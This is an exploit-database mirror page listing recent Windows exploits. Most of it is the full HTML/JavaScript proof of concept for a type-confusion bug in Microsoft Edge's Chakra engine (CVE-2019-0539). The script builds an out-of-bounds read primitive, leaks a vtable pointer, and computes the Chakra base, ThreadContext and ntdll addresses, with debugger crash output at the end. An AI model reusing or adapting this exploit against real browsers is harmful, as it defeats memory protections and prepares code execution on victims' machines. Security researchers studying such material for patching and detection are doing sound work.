Menu

Improved exploit search engine. Try it out

"Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion"

Author

"Fahad Aid Alharbi"

Platform

windows

Release date

2019-03-04

Release Date Title Type Platform Author
2019-05-24 "Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption" remote windows "Simon Zuckerbraun"
2019-05-24 "Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow" local windows "Uday Mittal"
2019-05-15 "Microsoft Windows - 'Win32k' Local Privilege Escalation" local windows ExpLife0011
2019-05-22 "Microsoft Internet Explorer 11 - Sandbox Escape" local windows SandboxEscaper
2019-05-22 "Microsoft Windows (x84) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation" local windows "Google Security Research"
2019-05-22 "Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 (17763.379) - Install DLL" local windows SandboxEscaper
2019-05-24 "Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)" dos windows Achilles
2019-05-24 "Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-23 "Terminal Services Manager 3.2.1 - Denial of Service" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Share Name' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Add Block' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-22 "TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "BlueStacks 4.80.0.1060 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-21 "Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "Huawei eSpace 1.1.11.103 - DLL Hijacking" local windows LiquidWorm
2019-05-20 "BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "docPrint Pro 8.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "PCL Converter 2.7 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "Encrypt PDF 2.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
Release Date Title Type Platform Author
2019-03-04 "Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion" dos windows "Fahad Aid Alharbi"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46485/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46485/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46485/40935/microsoft-edge-chakra-1114-read-permission-via-type-confusion/download/", "exploit_id": "46485", "exploit_description": "\"Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion\"", "exploit_date": "2019-03-04", "exploit_author": "\"Fahad Aid Alharbi\"", "exploit_type": "dos", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
<html>
<script>

/*
# Exploit Title: [getting Read permission through Type Confusion]
# Date: [date]
# Exploit Author: [Fahad Aid Alharbi]
# Vendor Homepage: [https://www.microsoft.com/en-us/]
# Version: [Chakra 1_11_4] (REQUIRED)
# Tested on: [Windows 10]
# CVE : [cve-2019-0539]
*/
/* author @0x4142 => Fahad Aid Alharbi 
 * cve-2019-0539
 * Getting Read &_^
 * date 27 Feb , 2019 

*/

var convert = new ArrayBuffer(0x100);
var u32 = new Uint32Array(convert);
var f64 = new Float64Array(convert);

var BASE = 0x100000000;

function hex(x) {
    return `0x${x.toString(16)}`
}

function bytes_to_u64(bytes) {
    return (bytes[0]+bytes[1]*0x100+bytes[2]*0x10000+bytes[3]*0x1000000
                +bytes[4]*0x100000000+bytes[5]*0x10000000000);
}

function i2f(x) {
    u32[0] = x % BASE;

    u32[1] = (x - (x % BASE)) / BASE;



    return f64[0];
}


function f2i(x) {
    f64[0] = x;
    return u32[0] + BASE * u32[1];
}


obj = {}
obj.a = 0x41;
obj.b = 0x42;
obj.c = 0x41;
obj.d = 0x42;
obj.e = 0x40;
obj.f = 0x40;
obj.g = 0x90;
obj.h = 0x90; 
obj.i = 0x90;

t = new ArrayBuffer(0x200);
newL = 0x1000;

hax = new ArrayBuffer(0x2000);
read_me = 0;


function hit_to_read(t){

    obj.h = hax; // set ta->buffer to hax
    obj.i = newL; // update target's length
    read_me = new Float64Array(t);

    return read_me;

}

  function read(r,read_me)
    {



        read_me[7] = i2f(r); // setup hax->buffer
        //hax = new ArrayBuffer(0x1000);
        return  hex(f2i(read_me[7])) 
  
    }



function cout(f){return document.write(f);}
function opt(o, c, value) {
   o.c = 1
   //o.a = "HELLO"
  // o.b = 3;
    //o.e = 1
    class A extends c {

    }

    o.a = value // will overwrite rcx , rdx , rax
    //o.b = value => chakra!Js::RecyclableObject::HasOnlyWritableDataProperties+0xe:
    //o.b = 0x42424242
    o.c = 555555
   // o.d = 4

}


function pwn() {

    for (let i = 0; i < 0x1000; i++) {
        let o = {a: 1, b: 2,c:3};
        opt(o, (function () {}), {});
    }

    let o = {a: 2222, b: 2,c:4,d:5};
    let cons = function () {};

    cons.prototype = o;
    /* line 120 
                        auxSlots *p 
    __Vfptr | type | 0x00000001234     | 0x0
    */

    opt(o, cons, obj);


    o.f = t

    read_me = hit_to_read(t);

    cout("[+] vtable pointer is " + hex(f2i(read_me[0])));
    vtable = hex(f2i(read_me[0]));

    buffer_addr = f2i(read_me[7]);

    Chakrabase = hex(vtable  - 0x59a3c0)

   cout("<br>")
   cout("[+] ChakraBase : " + Chakrabase)


    cout("<br>buffer_addr: " + read(buffer_addr + 40 , read_me))

    ThreadContext = read(Chakrabase - 0xffec5448,read_me)
    Ntdll = read(Chakrabase - 0xdd9a0000,read_me)
    cout("<br>")
    cout("[+] ThreadContext : " + ThreadContext)
    cout("<br>")
    cout("[+] Ntdl : " + Ntdll)
    
    
}

pwn();


/*

s=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59:
00007ffc`d61f4109 4c8b14c8        mov     r10,qword ptr [rax+rcx*8] ds:00010000`41414141=????????????????





*/

/*

s=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59:
00007ffc`d61f4109 4c8b14c8        mov     r10,qword ptr [rax+rcx*8] ds:00010000`41414141=????????????????





*/
</script></html>